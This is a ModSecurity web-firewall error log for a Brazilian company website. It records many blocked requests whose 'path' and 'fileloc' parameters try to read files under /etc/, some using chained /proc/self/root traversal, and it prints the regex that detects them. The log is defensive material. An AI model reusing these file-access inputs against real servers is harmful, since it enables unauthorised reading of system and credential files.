[Fri Mar 20 10:04:12.504190 2026] [:error] [pid 10189:tid 140411708356352] [client 74.7.243.128:41276] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1FzDJ3M9BSuKP7CAY7DAAAAIQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 10:04:41.167928 2026] [:error] [pid 11642:tid 140411624429312] [client 74.7.243.128:52014] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1F6bninkcc-iUj5Ap3EQAAA44"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 10:05:06.499399 2026] [:error] [pid 9818:tid 140411574073088] [client 57.141.18.26:58436] [client 57.141.18.26] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1GAl1pVZ5mVmJwsFNJ4AAAAFQ"]
[Fri Mar 20 10:05:19.712061 2026] [:error] [pid 10189:tid 140411725141760] [client 74.7.244.43:35248] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab1GDzJ3M9BSuKP7CAY7ewAAAII"]
[Fri Mar 20 10:05:34.197962 2026] [:error] [pid 10189:tid 140411666392832] [client 57.141.18.116:59406] [client 57.141.18.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1GHjJ3M9BSuKP7CAY7pQAAAIk"]
[Fri Mar 20 10:06:08.755071 2026] [:error] [pid 11642:tid 140411607643904] [client 57.141.18.14:60632] [client 57.141.18.14] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/magic"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1GQLninkcc-iUj5Ap3QgAAA5A"]
[Fri Mar 20 10:06:44.044127 2026] [:error] [pid 7893:tid 140411540502272] [client 57.141.18.101:33620] [client 57.141.18.101] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/virc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1GZBCii7xarUs8iHaC5AAAAhg"]
[Fri Mar 20 10:07:05.478347 2026] [:error] [pid 21219:tid 140411666392832] [client 57.141.18.90:34242] [client 57.141.18.90] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1GefXLqtnMIWvjpaK0JAAAAok"]
[Fri Mar 20 10:07:19.356697 2026] [:error] [pid 15826:tid 140411683178240] [client 57.141.18.69:34682] [client 57.141.18.69] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rsyncd.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1Gh-oXxyEfFpUF8f-aYgAAAUc"]
[Fri Mar 20 10:07:20.459277 2026] [:error] [pid 21219:tid 140411632822016] [client 57.141.18.72:34840] [client 57.141.18.72] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/subuid"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1GiPXLqtnMIWvjpaK0LQAAAo0"]
[Fri Mar 20 10:07:21.004227 2026] [:error] [pid 7235:tid 140411716749056] [client 57.141.18.116:34850] [client 57.141.18.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/nsswitch.conf.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1GifqxLDW4GITHUkQDTgAAAQM"]
[Fri Mar 20 10:07:39.135633 2026] [:error] [pid 7893:tid 140411725141760] [client 57.141.18.88:35386] [client 57.141.18.88] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1GmxCii7xarUs8iHaDEQAAAgI"]
[Fri Mar 20 10:07:39.603449 2026] [:error] [pid 11642:tid 140411582465792] [client 57.141.18.98:35320] [client 57.141.18.98] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/bashrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1Gm7ninkcc-iUj5Ap3oAAAA5M"]
[Fri Mar 20 10:07:41.844950 2026] [:error] [pid 11642:tid 140411540502272] [client 57.141.18.75:35456] [client 57.141.18.75] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1Gnbninkcc-iUj5Ap3pQAAA5g"]
[Fri Mar 20 10:08:04.342754 2026] [:error] [pid 7893:tid 140411666392832] [client 57.141.18.72:36064] [client 57.141.18.72] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/uwsgi.ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1GtBCii7xarUs8iHaDHQAAAgk"]
[Fri Mar 20 10:08:07.935362 2026] [:error] [pid 7235:tid 140411565680384] [client 57.141.18.73:36210] [client 57.141.18.73] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/vimrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1Gt_qxLDW4GITHUkQDZAAAARU"]
[Fri Mar 20 10:08:19.655383 2026] [:error] [pid 10189:tid 140411741927168] [client 57.141.18.8:36600] [client 57.141.18.8] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1GwzJ3M9BSuKP7CAY8GgAAAIA"]
[Fri Mar 20 10:08:41.009879 2026] [:error] [pid 10189:tid 140411574073088] [client 57.141.18.40:37318] [client 57.141.18.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/chrony.keys"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1G2TJ3M9BSuKP7CAY8IwAAAJQ"]
[Fri Mar 20 10:08:57.766988 2026] [:error] [pid 26799:tid 140411666392832] [client 57.141.18.124:37902] [client 57.141.18.124] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dovecot.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1G6da6ubjKNq_cu4bzjAAAA0k"]
[Fri Mar 20 10:09:06.103249 2026] [:error] [pid 21219:tid 140411548894976] [client 74.7.228.61:48232] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab1G8vXLqtnMIWvjpaK0awAAApc"]
[Fri Mar 20 10:09:12.163559 2026] [:error] [pid 10189:tid 140411683178240] [client 57.141.18.119:38318] [client 57.141.18.119] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1G-DJ3M9BSuKP7CAY8TgAAAIc"]
[Fri Mar 20 10:09:14.136811 2026] [:error] [pid 7893:tid 140411674785536] [client 57.141.18.86:38412] [client 57.141.18.86] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/netconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1G-hCii7xarUs8iHaDRAAAAgg"]
[Fri Mar 20 10:09:26.190291 2026] [:error] [pid 7235:tid 140411624429312] [client 57.141.18.46:38766] [client 57.141.18.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/issue"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1HBvqxLDW4GITHUkQDkwAAAQ4"]
[Fri Mar 20 10:09:48.104853 2026] [:error] [pid 7235:tid 140411658000128] [client 57.141.18.68:39574] [client 57.141.18.68] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/profile"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1HHPqxLDW4GITHUkQDpQAAAQo"]
[Fri Mar 20 10:10:16.178277 2026] [:error] [pid 7235:tid 140411658000128] [client 57.141.18.90:40514] [client 57.141.18.90] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1HOPqxLDW4GITHUkQDtQAAAQo"]
[Fri Mar 20 10:10:23.352822 2026] [:error] [pid 21219:tid 140411548894976] [client 74.7.244.43:59948] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab1HP_XLqtnMIWvjpaK0mAAAApc"]
[Fri Mar 20 10:11:02.887813 2026] [:error] [pid 11167:tid 140411632822016] [client 57.141.18.7:42070] [client 57.141.18.7] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dnsmasq.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1HZvHIg5MgXLBnicMRQgAAAc0"]
[Fri Mar 20 10:11:29.129570 2026] [:error] [pid 7893:tid 140411632822016] [client 57.141.18.123:42922] [client 57.141.18.123] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1HgRCii7xarUs8iHaDnQAAAg0"]
[Fri Mar 20 10:11:30.770755 2026] [:error] [pid 7235:tid 140411666392832] [client 57.141.18.17:42980] [client 57.141.18.17] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1HgvqxLDW4GITHUkQD6AAAAQk"]
